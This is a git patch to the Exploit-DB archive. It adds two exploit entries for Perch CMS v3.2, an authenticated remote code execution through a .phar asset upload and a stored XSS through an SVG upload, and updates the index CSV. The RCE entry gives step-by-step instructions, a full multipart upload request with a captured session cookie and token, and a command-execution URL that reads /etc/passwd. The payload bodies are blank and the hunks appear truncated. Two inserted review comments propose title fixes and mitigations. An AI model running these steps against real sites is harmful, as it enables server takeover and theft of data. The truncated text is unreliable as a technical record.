From 033e7ba3e02a24af757ddf03242876bf270fb293 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Sat, 22 Jul 2023 00:16:25 +0000
Subject: [PATCH] DB: 2023-07-22

3 changes to exploits/shellcodes/ghdb
Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
Perch v3.2 - Remote Code Execution (RCE)
Perch v3.2 - Stored XSS
Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
---
 exploits/php/webapps/51620.txt | 89 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/51621.txt | 31 ++++++++++++
 files_exploits.csv | 6 ++-
 3 files changed, 124 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/51620.txt
 create mode 100644 exploits/php/webapps/51621.txt
diff --git a/exploits/php/webapps/51620.txt b/exploits/php/webapps/51620.txt
new file mode 100644
index 000000000..0828e87fd
--- /dev/null
+++ b/exploits/php/webapps/51620.txt
@@ -0,0 +1,89 @@
+Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
+Application: Perch Cms
+Version: v3.2
+Bugs: RCE
+Technology: PHP
+Vendor URL: https://grabaperch.com/
+Software Link: https://grabaperch.com/download
+Date of found: 21.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account as admin
+2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
+3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
+4. upload poc.phar file
+
+poc.phar file contents :
+
+
+5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd
+
+
+poc request:
+
+POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
+Host: localhost
+Content-Length: 1071
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
+Connection: close
+
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="resourceTitle"
+
+test
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="image"; filename="poc.phar"
+Content-Type: application/octet-stream
+
+
+
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="image_field"
+
+1
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="image_assetID"
+
+
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="resourceBucket"
+
+admin
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="tags"
+
+test
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="btnsubmit"
+
+Submit
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="formaction"
+
+edit
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="token"
+
+5494af3e8dbe5ac399ca7f12219cfe82
+------WebKitFormBoundaryYGoerZn09hHSjd4Z--
\ No newline at end of file
diff --git a/exploits/php/webapps/51621.txt b/exploits/php/webapps/51621.txt
new file mode 100644
index 000000000..0f82799a0
--- /dev/null
+++ b/exploits/php/webapps/51621.txt
@@ -0,0 +1,31 @@
+Exploit Title: Perch v3.2 - Stored XSS
+Application: Perch Cms
+Version: v3.2
+Bugs: XSS
+Technology: PHP
+Vendor URL: https://grabaperch.com/
+Software Link: https://grabaperch.com/download
+Date of found: 21.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account
+2. go to http://localhost/perch_v3.2/perch/core/settings/
+3. upload svg file
+
+"""
+
+
+
+
+
+
+
+"""
+4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4cd67671f..55292c0a6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
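Review bot: The title line `Exploit Title: Perch v3.2 - Remote Code Execution (RCE)` omits the precondition that step 1 states (`login to account as admin`), so the entry reads as if no authentication were needed; `Exploit Title: Perch v3.2 - Remote Code Execution (RCE) (Authenticated)` would let defenders triage it correctly, and the matching description in the `files_exploits.csv` row for 51620 should change with it. The write-up names no root cause or fix: from the steps, the asset upload accepts a `.phar` file into the web-served `perch/resources/admin/` bucket and the server then runs it, which presumably depends on the web server mapping that extension to the PHP handler. A closing line such as `Mitigation: restrict asset uploads to an extension allow-list and disable script execution under perch/resources/` would make the entry actionable for administrators. The captured request also carries a `PHPSESSID` cookie and a form `token` from the author's local session; replacing both with placeholders avoids publishing session material.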
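Review bot: Step 1 of the stored XSS entry, `1. login to account`, does not say which role can reach `perch/core/settings/` and upload the file, so the privilege required cannot be judged from the entry; naming the role there, as the RCE entry does with "as admin", would fix that. The listing between the `"""` markers is empty in this rendering and the hunk appears shorter than its `+1,31` header, so part of the file seems to have been lost in extraction. For administrators the relevant point is that an uploaded SVG is served from `perch/resources/` and rendered inline by the browser; a closing line such as `Mitigation: sanitize SVG on upload or serve it with Content-Disposition: attachment and a restrictive Content-Security-Policy` would document the fix.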
@@ -24773,7 +24773,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
-51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-19,0,CVE-2023-37629,,,,,
+51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-21,1,CVE-2023-37629,,,,,
 51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-09,1,CVE-2023-2246,,,,,
 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
@@ -25615,6 +25615,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 13901,exploits/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",webapps,php,,2010-06-16,,0,OSVDB-52214,,,,,
 4551,exploits/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,webapps,php,,2007-10-20,,1,OSVDB-45501;CVE-2007-5631;OSVDB-45500;OSVDB-45499;OSVDB-45498;OSVDB-45497;OSVDB-45496;OSVDB-45495,,,,,
 11938,exploits/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,webapps,php,,2010-03-29,,1,OSVDB-63348;CVE-2010-1309;CVE-2008-7254,,,,http://www.exploit-db.compepsi-0.6-BETA2.tar.bz2,
+51620,exploits/php/webapps/51620.txt,"Perch v3.2 - Remote Code Execution (RCE)",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
+51621,exploits/php/webapps/51621.txt,"Perch v3.2 - Stored XSS",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
 43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,,2018-01-15,2018-01-15,0,CVE-2017-17976,,,,,
 6847,exploits/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,webapps,php,,2008-10-26,,1,OSVDB-49440,,,,,http://www.bugreport.ir/index_55.htm
 12819,exploits/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,webapps,php,,2010-05-30,,1,,,,,,
@@ -33720,7 +33722,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35394,exploits/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting",2011-02-23,"AutoSec Tools",webapps,php,,2011-02-23,2014-11-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/46591/info
 16218,exploits/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",webapps,php,,2011-02-23,2011-02-23,0,OSVDB-71006,"WordPress Plugin",,,http://www.exploit-db.comz-vote.zip,http://www.htbridge.ch/advisory/sql_injection_in_z_vote_wordpress_plugin.html
 38050,exploits/php/webapps/38050.txt,"WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87834,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56663/info
-51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",2022-10-06,"Rizacan Tufan",webapps,php,,2022-10-06,2022-10-06,0,CVE-2022-2840,,,,,
+51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",2022-10-06,"Rizacan Tufan",webapps,php,,2022-10-06,2023-07-21,1,CVE-2022-2840,,,,,
 18111,exploits/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - 'ajax_save_name.php' Remote Code Execution",2011-11-13,EgiX,webapps,php,,2011-11-13,2011-11-13,1,OSVDB-77091,"WordPress Plugin",,,http://www.exploit-db.comzingiri-web-shop.2.2.3.zip,
 38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php,,2012-12-30,2015-09-08,1,OSVDB-88295,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56777/info
 38046,exploits/php/webapps/38046.txt,"WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87833,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56659/info